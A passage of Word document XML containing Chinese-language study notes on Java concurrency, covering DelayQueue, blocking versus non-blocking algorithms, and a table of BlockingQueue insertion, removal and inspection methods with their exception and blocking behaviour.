    <w:p w:rsidR="00980530" w:rsidRDefault="00980530" w:rsidP="00F32669">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(4)DelayQueue</w:t>
      </w:r>
      <w:r w:rsidR="00CD092A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>：延迟队列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00003952" w:rsidRPr="00BA382F" w:rsidRDefault="00003952" w:rsidP="00F32669">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00003952">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://www.cnblogs.com/sunzhenchao/p/3515085.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA382F" w:rsidRDefault="00BA382F" w:rsidP="00F32669">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7F66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>阻塞算法其实很好理解，简单点理解就是加锁，比如在</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7F66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7F66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>中看到的那样，再往前推点，那就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7F66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7F66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。相比而言，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7F66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3366FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>非阻塞算法的设计和实现都很困难，要通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7F66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>低级的原子性</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7F66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3366FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>来支持并发</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7F66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105F17" w:rsidRPr="00105F17" w:rsidRDefault="00105F17" w:rsidP="00105F17">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，顾名思义，“阻塞队列”：可以提供阻塞功能的队列。</w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C243D" w:rsidRPr="004C243D" w:rsidRDefault="00105F17" w:rsidP="00105F17">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>首先，看看</w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>提供的常用方法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1704"/>
        <w:gridCol w:w="1704"/>
        <w:gridCol w:w="1704"/>
        <w:gridCol w:w="1233"/>
        <w:gridCol w:w="2177"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C243D" w:rsidTr="004C243D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00105F17">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00F9298A">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>可能报异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00F9298A">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>返回布尔值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1233" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00105F17">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>可能阻塞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2177" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00105F17">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>设定等待时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C243D" w:rsidTr="004C243D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00F9298A">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>入队</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00105F17">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>add(e)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00105F17">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>offer(e)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1233" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00105F17">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>put(e)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2177" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00105F17">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>offer(e, timeout, unit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C243D" w:rsidTr="004C243D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00F9298A">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>出队</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00105F17">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>remove()</w:t>
            </w:r>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00105F17">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>poll()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1233" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00105F17">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>take()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2177" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00105F17">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>poll(timeout, unit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C243D" w:rsidTr="004C243D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00F9298A">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>查看</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00105F17">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>element()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00105F17">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>peek()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1233" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00105F17">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2177" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C243D" w:rsidRDefault="004C243D" w:rsidP="00105F17">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105F17">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00105F17" w:rsidRPr="00105F17" w:rsidRDefault="00105F17" w:rsidP="00105F17">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>从上表可以很明显看出每个方法的作用，这个不用多说。我想说的是：</w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105F17" w:rsidRPr="00105F17" w:rsidRDefault="00105F17" w:rsidP="00105F17">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">add(e) remove() element() </w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>方法不会阻塞线程。当不满足约束条件时，会抛出</w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IllegalStateException </w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>异常。例如：当队列被元素填满后，再调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>add(e)</w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，则会抛出异常。</w:t>
      </w:r>
    </w:p>
